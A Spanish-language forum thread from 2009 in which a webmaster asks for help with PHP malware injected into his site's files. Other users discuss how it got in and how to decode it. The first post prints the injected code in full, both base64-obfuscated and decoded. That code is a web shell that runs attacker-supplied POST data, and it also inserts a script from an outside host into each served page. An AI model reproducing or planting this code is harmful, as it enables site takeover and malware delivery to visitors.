Virus en Mi sitio

trescirculos · #1 (**permalink**) 12/10/2009, 12:57

Hola Colegas!

Tengo un problema que por lo que he averiguado varios sitios estan sufriendo.

Me han intentado hackear el sitio, me inyectaron un codigo Base64 que es el siguiente

Código PHP:

  <?php eval(base64_decode('aWYoIWlzc2V0KCRmY2YxKSl7ZnVuY3Rpb24gZmNmKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMnR5ZVc5c1lXNHVZMjl0TDJsdFlXZGxjeTltWVhacFkyOXVMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gZmNmMigkYSwkYiwkYywkZCl7Z2xvYmFsICRmY2YxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRmY2YxKSljYWxsX3VzZXJfZnVuYygkZmNmMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdmY2YnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZmNmJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGZjZmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2ZjZjInKSkhPSdmY2YyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Ya lo desencripté, y es este:

Código PHP:

  if(!isset($fcf1)){function fcf($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2tyeW9sYW4uY29tL2ltYWdlcy9mYXZpY29uLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function fcf2($a,$b,$c,$d){global $fcf1;$s=array();if(function_exists($fcf1))call_user_func($fcf1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='fcf')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('fcf');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$fcfl=(($a=@set_error_handler('fcf2'))!='fcf2')?$a:0;eval(base64_decode($_POST['e']));

Pero no logro entender lo que quizo hacer el hacker.

Es la segunda vez que me pasa y no se como evitar que escriban sobre mis archivos php.

Gracias.

pinchu · #2 (**permalink**) 12/10/2009, 13:09

¿cómo se supone que te lo inyectaron?

trescirculos · #3 (**permalink**) 12/10/2009, 13:14

Mediante MySQL Inject, por lo que se, lo crearon en python

conkerick · #4 (**permalink**) 12/10/2009, 13:35

Debes ver que dato dejas sin limpiar, y cambiarle los permisos a los archivos a 755 creo.

GatorV · #5 (**permalink**) 12/10/2009, 14:18

Mensaje trasladado desde PHP a Web general

trescirculos · #6 (**permalink**) 12/10/2009, 15:24

Cita:

Iniciado por conkerick

Debes ver que dato dejas sin limpiar, y cambiarle los permisos a los archivos a 755 creo.

Es que eso es justamente lo que me llama la atención los archivos que me modificaron son 48 y ninguno de ellos esta con los permisos 755 ni 777, todos ellos estan el 644. No se realmente que hacer

trescirculos · #7 (**permalink**) 14/10/2009, 16:27

La solucion que encontre fue actualizar la version 4 a 5.2.0 de php. Hasta ahora sin problemas

borricos · #8 (**permalink**) 15/10/2009, 01:21

En alguna de mis webs me insertaron un codigo similar. Como has desencriptado ese codigo?

trescirculos · #9 (**permalink**) 15/10/2009, 12:37

Borricos, solo tenes que sustituir <?php eval(base64_decode('aWYoIWl, bla, bla bla
por:

<?php echo(base64_decode('aWYoIWl, bla, bla ,bla

publicarlo y te mustra el codigo.

Saludos